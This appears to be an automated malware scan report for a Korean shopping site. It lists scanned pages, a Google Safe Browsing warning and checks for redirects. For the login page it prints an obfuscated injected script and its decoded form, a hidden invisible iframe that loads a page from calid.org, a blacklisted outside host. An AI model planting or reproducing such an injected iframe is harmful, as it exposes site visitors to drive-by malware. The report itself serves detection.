Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=najumelon.co.kr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.najumelon.co.kr/ | 200 OK Content-Length: 37152 Content-Type: text/html | clean |
http://www.najumelon.co.kr/./script/admin.js | 200 OK Content-Length: 16501 Content-Type: application/javascript | clean |
http://www.najumelon.co.kr/./script/menuLink.js | 200 OK Content-Length: 6230 Content-Type: application/javascript | clean |
http://www.najumelon.co.kr/./script/noticeLayer.js | 200 OK Content-Length: 1593 Content-Type: application/javascript | clean |
http://www.najumelon.co.kr/cart.php | 200 OK Content-Length: 32211 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function cartEdit(Obj,bLimit,limitCnt,minbuyCnt,maxbuyCnt,bOptionStock,iOptionCnt) { var Cnt = Obj.cnt.value; if(Cnt=="" || Cnt=="0" ||Cnt==0 || !numCheck(Cnt)) { alert("±¸¸Å¼ö·®ÀÌ ¿Ã¹Ù¸£Áö ¾Ê½À´Ï´Ù."); Obj.cnt.focus(); } else if(bLimit && Cnt > limitCnt) { alert("Á˼ÛÇÕ´Ï´Ù. ÇØ´ç »óÇ°ÀÇ Àüü Àç°í¼ö·®ÀÌ ºÎÁ·ÇÕ´Ï´Ù.\n\nÃÑ Àç°í·® : "+limitCnt); Obj.cnt.value = limitCnt; Obj.cnt.focus(); } else if(bOpti Obj.cnt.value = maxbuyCnt; Obj.cnt.focus(); } else { Obj.action = "cart_ok.php?act=edit"; Obj.submit(); } } function cartDel(Obj) { Obj.action = "cart_ok.php?act=del"; Obj.submit(); } function cartok(url,flag) { if(flag=="y") { alert("»óÇ°Áß Ç°Àý, º¸·ù, ´ÜÁ¾µÈ Á¦Ç°Àº ±¸¸ÅÇÏ½Ç ¼ö ¾ø½À´Ï´Ù.\n\nÇØ´ç »óÇ°À» »èÁ¦ÇØÁÖ¼¼¿ä"); } else { location.href= url; } } Antivirus reports:
| ||
http://www.najumelon.co.kr/index.php | 200 OK Content-Length: 37152 Content-Type: text/html | clean |
http://www.najumelon.co.kr/login.php | 200 OK Content-Length: 34176 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: calid.org var VNmuPUhJTWMyczbVPRgN = "KZyuRadTUsKqGxlVSTfl";var prkSqLoGdUTnuSiMtLgO = "ErFKoqgGJLszCcRtoGAR";var bTFVmnifzPuDGzOvpvBz = "GuzJXRDLXDdyXiUJWDpV";var XYeaOFHPZcSiTsZivGcA = "lKm60lKm105lKm102lKm114lKm97lKm109lKm101lKm32lKm119lKm105lKm100lKm116lKm104lKm61lKm34lKm52lKm56lKm48lKm34lKm32lKm104lKm101lKm105lKm103lKm104lKm116lKm61lKm34lKm54lKm48lKm34lKm32lKm115lKm114lKm99lKm61lKm34lKm104lKm116lKm116lKm112lKm58lKm47lKm47lKm99lKm97lKm108lKm105lKm100lKm46 ...[1914 bytes skipped]... Decoded script: <iframe width="480" height="60" src="http://calid.org/pro/in.cgi?2" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe> | ||
http://www.najumelon.co.kr/member_article.php | 200 OK Content-Length: 50042 Content-Type: text/html | clean |
http://www.najumelon.co.kr/order_refer.php | 200 OK Content-Length: 30321 Content-Type: text/html | clean |
http://www.najumelon.co.kr/intro01.php?mode=intro | 200 OK Content-Length: 24843 Content-Type: text/html | clean |
http://www.najumelon.co.kr/intro05_02.php?mode=intro | 200 OK Content-Length: 26398 Content-Type: text/html | clean |
http://www.najumelon.co.kr/movie_02.php | 200 OK Content-Length: 3963 Content-Type: text/html | clean |
http://www.najumelon.co.kr/test404page.js | 404 Not Found Content-Length: 7087 Content-Type: text/html | clean |
http://www.najumelon.co.kr/movie_01.php | 200 OK Content-Length: 3975 Content-Type: text/html | clean |
http://www.najumelon.co.kr/intro06.php?mode=intro | 200 OK Content-Length: 25184 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: najumelon.co.kr
Result:
GET / HTTP/1.1
Host: najumelon.co.kr
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: najumelon.co.kr
Referer: http://www.google.com/search?q=najumelon.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: najumelon.co.kr
Referer: http://www.google.com/search?q=najumelon.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.